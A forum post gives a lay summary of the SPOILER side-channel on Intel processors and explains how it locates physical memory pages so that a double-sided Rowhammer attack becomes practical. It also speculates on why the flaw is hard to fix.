So to those who skimmed it (or didn't read):
They use SPOILER as a way to determine physically addresses using virtual memory pages read/write and see where the "spike" is where the virtual page is sitting on two physical pages (which causes longer read/write).
Using that information, they calculate where the physical pages are sitting.
Then, once they know that, they can use a dram attack called Double Sided Rowhammer.
That attack is meant to force row refreshes inside the same bank of the dram memory that contain said pages, in order to force rows inside the dram to flip bits when adjusted rows (on either side, hence double sided) around them get refreshed constantly, until memory bits in the unrefreshed, flip. That is a dram vulnerability, not an intel specific one though.
That way, they basically force a change on the memory, and if they are doing it in the right place, can use that to exploit information, gain access, etc.
Rowhammer was found in 2014. But it was hard to use as it was hard to determine where the physical pages were inside the virtual space of an application.
Using SPOILER though, they can "bypass" that issue, and allow Rowhammer to do its dirty work.
It will be very hard for intel to fix the issue, because how the virtual memory and physical memory works. And it can't be fixed via firmware if right, because that issue of finding those physical page locations is inherent in the read/write of the virtual pages.
It is not like they can fix the "spike time" that notify where the pages are, since reading two pages inside the memory, will always takes longer.
And once they can determine physical page locations, Rowhammer (or other physical memory exploits), can come back on the table.
To "fix" it, intel will need to find a way to block Rowhammer from flipping bits in the cache, since they can't stop SPOILER. And that will require that when rows gets refresh, they must also start to refresh everything around it, and so on, and it will cause a chain reaction of heavy slowdown.
Why they couldn't make it happen in AMD or ARM, is because they couldn't distinguish the little spikes in read that say whether a virtual page was sitting on two physical pages.
Last edited by Defoler; 03-05-2019 at 09:02 AM.